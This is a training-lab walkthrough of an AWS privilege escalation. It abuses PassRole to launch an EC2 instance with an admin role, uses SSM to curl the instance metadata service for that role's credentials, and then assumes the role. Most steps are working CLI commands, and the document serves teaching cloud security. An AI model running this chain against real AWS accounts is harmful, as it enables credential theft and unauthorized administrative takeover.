Lab Walkthrough - Pass Role: EC2
In this lab walkthrough, we show how in AWS EC2, overly permissive permissions can be abused by a user to perform privileged operations.
As the AWS documentation reads :
To pass a role (and its permissions) to an AWS service, a user must have permissions to pass the role to the service. This helps administrators ensure that only approved users can configure a service with a role that grants permissions.
However, overly permissive permissions can be abused by a user to perform privileged operations.
Before getting started, let’s look at a few basic things:
EC2 or ec2: Elastic Compute Cloud (EC2) is a web service offered by Amazon that allows you to provision virtual machines in the cloud. These virtual machines are also referred to as EC2 instances.
VPC: A Virtual Private Cloud (VPC) refers to a logically isolated section within a public cloud, therefore providing a private cloud computing environment.
Subnet: A subnet or subnetwork refers to a range of IP addresses in the virtual private cloud.
Security group: A security group associated with a resource (say an EC2 instance) can be thought of as a virtual firewall that controls the traffic that can reach and leave the resource.
AMI: An Amazon Machine Image (AMI) is like a software configuration template that provides the information needed to create an instance within the Amazon Elastic Compute Cloud.
SSM: AWS Systems Manager formerly known as SSM (Simple Systems Manager) is a management tool that provides operational insights and control of infrastructure on AWS. It can be used to remotely run commands on an EC2 instance as well.
The objective is to leverage the policy attached to the student user and attain administrative privileges on the AWS account.
Step 1: Configure AWS CLI to use the provided credentials.
Step 2: List the policies attached to the user. Also, list inline policies attached to the user.
aws iam list-attached-user-policies --user-name student aws iam list-user-policies --user-name student
Step 3: Try creating a user on the AWS account.
aws iam create-user --user-name Bob
User creation failed due to insufficient privileges.
Step 4: Check the policy permissions and details.
aws iam get-user-policy --user-name student --policy-name ConfigureEC2Role
The student user can run EC2 instances and pass a role to the EC2 instance. Since the student user also has permission to interact with the SSM service, the student user can execute commands on the EC2 instances via SSM.
Step 5: List roles on the AWS account which can be passed to the EC2 service.
aws iam list roles
Step 6: Check ec2admin role policies and permissions.
aws iam list-role-policies --role-name ec2admin
Step 7: Check policy permissions.
aws iam get-role-policy --role-name ec2admin --policy-name terraform-20210212121709495300000001
The ec2admin role allows Administrator access on the AWS account.
Now, an EC2 instance has to be launched inside a subnet that has to be inside a VPC and it must also have a security group attached to it. For this purpose, we first need to find all the required information. In the next few steps, we will do the same.
Step 8: Since an EC2 instance is created out of an AMI, we need to find an image. Amazon Linux 2 AMIs are the latest images provided by AWS for Linux operating system. Let’s find the AMI id for Amazon Linux 2 AMI.
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json
The AMI id is ami-0d08a21fc010da680
Step 9: Check the subnets available in the AWS account:
aws ec2 describe-subnets
Make a note of subnet id.
Step 10: Check security groups for ec2 service.
aws ec2 describe-security-groups
Make a note of the security group id.
Step 11: List instance profiles for the AWS account.
aws iam list-instance-profiles
Make a note of the ec2 instance profile name.
Step 12: Now you can start an ec2 instance using all the collected details.
aws ec2 run-instances --subnet-id subnet-0dfbb465103aa1c2d --image-id ami-0d08a21fc010da680 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-0106a4a8e91b3a682"
Make a note of the instance id.
Step 13: Run commands on the remote ec2 instance using SSM.
aws ssm send-command \ --document-name "AWS-RunShellScript" \ --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \ --targets "Key=instanceids,Values=i-0da83d9b4322af4fa" \ --comment "aws cli 1"
Make a note of command id. The executed command will interact with the metadata service and print out the temporary access credentials of the role associated with the EC2 instance.
Step 14: Get the command’s output using SSM.
aws ssm get-command-invocation \ --command-id "0765bff4-4966-446f-a0a2-4e0cdfee565f" \ --instance-id "i-0da83d9b4322af4fa"
Command execution is successful. Make a note of Access keys and session tokens.
Step 15: Note down access keys from the command output and assume the ec2admin role by exporting access key id, secret access key, and session token as environment variables.
export AWS_ACCESS_KEY_ID=<access key id> export AWS_SECRET_ACCESS_KEY=<secret access key> export AWS_SESSION_TOKEN=<session token>
Step 16: Check caller identity to confirm whether assuming role was successful.
aws sts get-caller-identity
Role assumed successfully.
Step 17: Try creating a new user on the AWS account to verify Administrative privileges.
aws iam create-user --user-name Bob
Successfully performed a privileged operation.